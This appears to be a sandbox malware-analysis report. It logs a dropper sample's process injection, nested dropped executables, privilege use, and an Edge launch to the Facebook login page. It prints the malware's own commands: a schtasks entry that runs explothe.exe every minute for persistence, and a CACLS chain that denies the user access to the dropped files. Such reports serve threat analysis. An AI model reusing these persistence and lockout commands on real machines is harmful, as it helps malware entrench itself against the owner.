Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EA06.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EF0A.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\F0C1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 824 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 824 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 824 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 824 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 824 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 824 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3172 wrote to memory of 1724 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E5AD.exe
PID 3172 wrote to memory of 1724 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E5AD.exe
PID 3172 wrote to memory of 1724 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E5AD.exe
PID 3172 wrote to memory of 4636 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E6B7.exe
PID 3172 wrote to memory of 4636 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E6B7.exe
PID 3172 wrote to memory of 4636 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E6B7.exe
PID 1724 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\E5AD.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe
PID 1724 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\E5AD.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe
PID 1724 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\E5AD.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe
PID 2576 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe
PID 2576 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe
PID 2576 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe
PID 1936 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe
PID 1936 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe
PID 1936 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe
PID 3172 wrote to memory of 2936 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3172 wrote to memory of 2936 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3172 wrote to memory of 3696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E90B.exe
PID 3172 wrote to memory of 3696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E90B.exe
PID 3172 wrote to memory of 3696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E90B.exe
PID 3396 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe
PID 3396 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe
PID 3396 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe
PID 4008 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1dQ56Ol6.exe
PID 4008 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1dQ56Ol6.exe
PID 4008 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1dQ56Ol6.exe
PID 4008 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mi256Fu.exe
PID 4008 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mi256Fu.exe
PID 4008 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mi256Fu.exe
PID 3172 wrote to memory of 3212 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EA06.exe
PID 3172 wrote to memory of 3212 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EA06.exe
PID 3172 wrote to memory of 3212 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EA06.exe
PID 3172 wrote to memory of 3364 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EAB3.exe
PID 3172 wrote to memory of 3364 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EAB3.exe
PID 3172 wrote to memory of 3364 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EAB3.exe
PID 2936 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2936 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3172 wrote to memory of 468 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EDD1.exe
PID 3172 wrote to memory of 468 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EDD1.exe
PID 3172 wrote to memory of 468 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EDD1.exe
PID 3172 wrote to memory of 2496 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EF0A.exe
PID 3172 wrote to memory of 2496 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EF0A.exe
PID 3172 wrote to memory of 2496 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EF0A.exe
PID 3364 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\EAB3.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3364 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\EAB3.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3364 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\EAB3.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3172 wrote to memory of 2228 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\F0C1.exe
PID 3172 wrote to memory of 2228 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\F0C1.exe
PID 3172 wrote to memory of 2228 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\F0C1.exe
PID 1368 wrote to memory of 4448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1368 wrote to memory of 4448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3172 wrote to memory of 2492 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\F834.exe
PID 3172 wrote to memory of 2492 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\F834.exe
PID 3172 wrote to memory of 2492 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\F834.exe
PID 4792 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 4792 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 4792 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 4792 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe

"C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 824 -ip 824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 824 -s 296

C:\Users\Admin\AppData\Local\Temp\E5AD.exe

C:\Users\Admin\AppData\Local\Temp\E5AD.exe

C:\Users\Admin\AppData\Local\Temp\E6B7.exe

C:\Users\Admin\AppData\Local\Temp\E6B7.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E7C2.bat" "

C:\Users\Admin\AppData\Local\Temp\E90B.exe

C:\Users\Admin\AppData\Local\Temp\E90B.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1dQ56Ol6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1dQ56Ol6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mi256Fu.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mi256Fu.exe

C:\Users\Admin\AppData\Local\Temp\EA06.exe

C:\Users\Admin\AppData\Local\Temp\EA06.exe

C:\Users\Admin\AppData\Local\Temp\EAB3.exe

C:\Users\Admin\AppData\Local\Temp\EAB3.exe

C:\Users\Admin\AppData\Local\Temp\EDD1.exe

C:\Users\Admin\AppData\Local\Temp\EDD1.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\EF0A.exe

C:\Users\Admin\AppData\Local\Temp\EF0A.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\F0C1.exe

C:\Users\Admin\AppData\Local\Temp\F0C1.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xfc,0x128,0x7ff9333d46f8,0x7ff9333d4708,0x7ff9333d4718

C:\Users\Admin\AppData\Local\Temp\F834.exe

C:\Users\Admin\AppData\Local\Temp\F834.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,16765038933789164313,16962189603449218242,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2572 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

